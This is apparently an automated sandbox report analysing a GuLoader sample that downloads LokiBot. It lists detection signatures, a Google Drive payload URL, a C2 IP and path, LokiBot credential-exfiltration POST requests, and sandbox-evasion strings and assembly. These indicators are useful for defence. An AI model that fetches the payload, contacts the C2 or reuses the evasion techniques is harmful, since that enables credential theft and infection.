
Windows Analysis Report SecuriteInfo.com.__vbaHresultCheckObj.22789.613

Overview

General Information

Sample Name: SecuriteInfo.com.__vbaHresultCheckObj.22789.613 (renamed file extension from 613 to exe)
Analysis ID: 483722
MD5: 308fb834ee02960ec122cf34712fa871
SHA1: 3162aff052c28b2ebf265eaaf5eadd0311e4299d
SHA256: a08af8c30e5a30a847fc94e370082ff8b9c9c7d5317d4fed0c3b4bc5854a496f
Tags: exe

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Hides threads from debuggers
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=16hJeQVa7vEC"}

Yara Overview

Memory Dumps

Source: 00000000.00000002.503499325.0000000002AD0000.00000040.00000001.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security

    Sigma Overview

    No Sigma rule has matched

    Jbx Signature Overview

    AV Detection:

    Found malware configuration
    Source: 00000000.00000002.503499325.0000000002AD0000.00000040.00000001.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=16hJeQVa7vEC"}
    Multi AV Scanner detection for submitted file
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Virustotal: Detection: 23%
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | ReversingLabs: Detection: 15%
    Multi AV Scanner detection for domain / URL
    Source: http://136.243.159.53/~element/page.php?id=121 | Virustotal: Detection: 6%
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: unknown | HTTPS traffic detected: 172.217.168.78:443 -> 192.168.2.3:49790 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.217.168.65:443 -> 192.168.2.3:49791 version: TLS 1.2

    Networking:

    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
    Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49792 -> 136.243.159.53:80
    Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49792 -> 136.243.159.53:80
    Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49792 -> 136.243.159.53:80
    Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49792 -> 136.243.159.53:80
    Source: Traffic | Snort IDS: 2410 WEB-PHP IGeneric Free Shopping Cart page.php access 192.168.2.3:49792 -> 136.243.159.53:80
    Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49793 -> 136.243.159.53:80
    Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49793 -> 136.243.159.53:80
    Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49793 -> 136.243.159.53:80
    Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49793 -> 136.243.159.53:80
    Source: Traffic | Snort IDS: 2410 WEB-PHP IGeneric Free Shopping Cart page.php access 192.168.2.3:49793 -> 136.243.159.53:80
    Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49794 -> 136.243.159.53:80
    Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49794 -> 136.243.159.53:80
    Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49794 -> 136.243.159.53:80
    Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49794 -> 136.243.159.53:80
    Source: Traffic | Snort IDS: 2410 WEB-PHP IGeneric Free Shopping Cart page.php access 192.168.2.3:49794 -> 136.243.159.53:80
    Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49795 -> 136.243.159.53:80
    Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49795 -> 136.243.159.53:80
    Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49795 -> 136.243.159.53:80
    Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49795 -> 136.243.159.53:80
    Source: Traffic | Snort IDS: 2410 WEB-PHP IGeneric Free Shopping Cart page.php access 192.168.2.3:49795 -> 136.243.159.53:80
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractor | URLs: https://drive.google.com/uc?export=download&id=16hJeQVa7vEC
    Source: Joe Sandbox View | ASN Name: HETZNER-ASDE
    Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Joe Sandbox View | IP Address: 136.243.159.53
    Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=16hJeQVa7vECqqXwxmeW5i0BX_hPCAorF HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: drive.google.com | Cache-Control: no-cache
    Source: global traffic | HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v3agssaj4m1da9uvntfjbdrnuso7gs0u/1631701050000/14094524972347321979/*/16hJeQVa7vECqqXwxmeW5i0BX_hPCAorF?e=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Cache-Control: no-cache | Host: doc-0c-5o-docs.googleusercontent.com | Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: POST /~element/page.php?id=121 HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 136.243.159.53 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: BA1747BC | Content-Length: 190 | Connection: close
    Source: global traffic | HTTP traffic detected: POST /~element/page.php?id=121 HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 136.243.159.53 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: BA1747BC | Content-Length: 190 | Connection: close
    Source: global traffic | HTTP traffic detected: POST /~element/page.php?id=121 HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 136.243.159.53 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: BA1747BC | Content-Length: 163 | Connection: close
    Source: global traffic | HTTP traffic detected: POST /~element/page.php?id=121 HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 136.243.159.53 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: BA1747BC | Content-Length: 163 | Connection: close
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknown | Network traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknown | TCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 15 Sep 2021 10:18:26 GMT | Server: Apache | Connection: close | Content-Type: text/html; charset=UTF-8 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732429567.00000000008D8000.00000004.00000020.sdmp | String found in binary or memory: http://136.243.159.53/~element/page.php?id=121
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732429567.00000000008D8000.00000004.00000020.sdmp | String found in binary or memory: http://136.243.159.53/~element/page.php?id=121.
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.724075568.000000000093F000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.722922786.0000000000938000.00000004.00000001.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.724075568.000000000093F000.00000004.00000001.sdmp | String found in binary or memory: https://doc-0c-5o-docs.googleusercontent.com/
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.724075568.000000000093F000.00000004.00000001.sdmp | String found in binary or memory: https://doc-0c-5o-docs.googleusercontent.com/-
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.722932523.0000000000940000.00000004.00000001.sdmp, SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732485311.0000000000924000.00000004.00000020.sdmp, SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.722922786.0000000000938000.00000004.00000001.sdmp | String found in binary or memory: https://doc-0c-5o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v3agssaj
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.724075568.000000000093F000.00000004.00000001.sdmp | String found in binary or memory: https://doc-0c-5o-docs.googleusercontent.com/tography
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732429567.00000000008D8000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732429567.00000000008D8000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=16hJeQVa7vECqqXwxmeW5i0BX_hPCAorF
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732625102.0000000002270000.00000004.00000001.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=16hJeQVa7vECqqXwxmeW5i0BX_hPCAorFwininet.dllMozilla/5
    Source: unknown | DNS traffic detected: queries for: drive.google.com

    System Summary:

    Potential malicious icon found
    Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 0_2_02AD0E9C NtWriteVirtualMemory,TerminateProcess
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 0_2_02AD5491 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 0_2_02AD944B NtProtectVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 0_2_02AD5B66 NtAllocateVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 0_2_02AD2EAE NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 0_2_02AD50B2 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 0_2_02AD4689 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 0_2_02AD5C2A NtAllocateVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 0_2_02AD940C NtProtectVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 0_2_02AD2672 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 0_2_02AD4A72 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 0_2_02AD4DA9 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 0_2_02AD7B98 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 0_2_02AD1F91 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 0_2_02AD05F3 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 0_2_02AD47D0 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 0_2_02AD4F3F NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 0_2_02AD4935 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 0_2_02AD7D4A NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 22_2_0056A07B Sleep,LdrInitializeThunk,NtProtectVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 22_2_00569F61 LdrInitializeThunk,NtProtectVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 22_2_00569F54 LdrInitializeThunk,NtProtectVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 22_2_00569F1A LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 22_2_00569F18 LdrInitializeThunk,NtProtectVirtualMemory
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Process Stats: CPU usage > 98%
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000000.00000000.222100367.000000000041D000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameFirnificat.exe vs SecuriteInfo.com.__vbaHresultCheckObj.22789.exe
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000000.501841988.000000000041D000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameFirnificat.exe vs SecuriteInfo.com.__vbaHresultCheckObj.22789.exe
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Binary or memory string: OriginalFilenameFirnificat.exe vs SecuriteInfo.com.__vbaHresultCheckObj.22789.exe
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe 'C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe'
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe 'C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe'
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
    Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@3/2@2/3
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

    Data Obfuscation:

    Yara detected GuLoader
    Source: Yara match | File source: 00000000.00000002.503499325.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 0_2_00404CE7 push ebp; iretd 0_2_00404CE8
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 0_2_00403391 pushad ; retf 0_2_00403392
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Process information set: NOGPFAULTERRORBOX

    Malware Analysis System Evasion:

    Tries to detect Any.run
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | File opened: C:\Program Files\qga\qga.exe
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000000.00000002.503555930.0000000003370000.00000004.00000001.sdmp | Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732625102.0000000002270000.00000004.00000001.sdmp | Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=16HJEQVA7VECQQXWXMEW5I0BX_HPCAORFWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000000.00000002.503555930.0000000003370000.00000004.00000001.sdmp, SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732625102.0000000002270000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | RDTSC instruction interceptor: First address: 000000000040BD3F second address: 000000000040BD3F instructions: 0x00000000 rdtsc 0x00000002 cmp bh, FFFFFFB8h 0x00000005 xor eax, edx 0x00000007 cmp al, F9h 0x00000009 dec edi 0x0000000a cmp esi, 000000C9h 0x00000010 fabs 0x00000012 jmp 00007F9C1C38B0F5h 0x00000014 cmp edi, 00000000h 0x00000017 jne 00007F9C1C38B016h 0x0000001d cmp cl, FFFFFFA5h 0x00000020 mov ebx, EA4B6B4Eh 0x00000025 cmp cx, 0065h 0x00000029 xor ebx, 08A587D2h 0x0000002f cmp ecx, 59h 0x00000032 xor ebx, 9719A8D1h 0x00000038 cmp bx, 005Ch 0x0000003c fldpi 0x0000003e jmp 00007F9C1C38B0F3h 0x00000040 xor ebx, 75B7444Dh 0x00000046 cmp ah, FFFFFFF0h 0x00000049 cmp ch, FFFFFFA0h 0x0000004c rdtsc
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe TID: 6908 | Thread sleep count: 71 > 30
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe TID: 6912 | Thread sleep time: -60000s >= -30000s
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Last function: Thread delayed
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Code function: 0_2_02AD8186 rdtsc 0_2_02AD8186
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Window / User API: threadDelayed 1144
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Window / User API: threadDelayed 8856
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | Thread delayed: delay time: 60000
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe | System information queried: ModuleInformation
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000000.00000002.503555930.0000000003370000.00000004.00000001.sdmp | Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732429567.00000000008D8000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732625102.0000000002270000.00000004.00000001.sdmp | Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=https://drive.google.com/uc?export=download&id=16hJeQVa7vECqqXwxmeW5i0BX_hPCAorFwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000000.00000002.503555930.0000000003370000.00000004.00000001.sdmp, SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732625102.0000000002270000.00000004.00000001.sdmp | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732485311.0000000000924000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW0000

    Anti Debugging: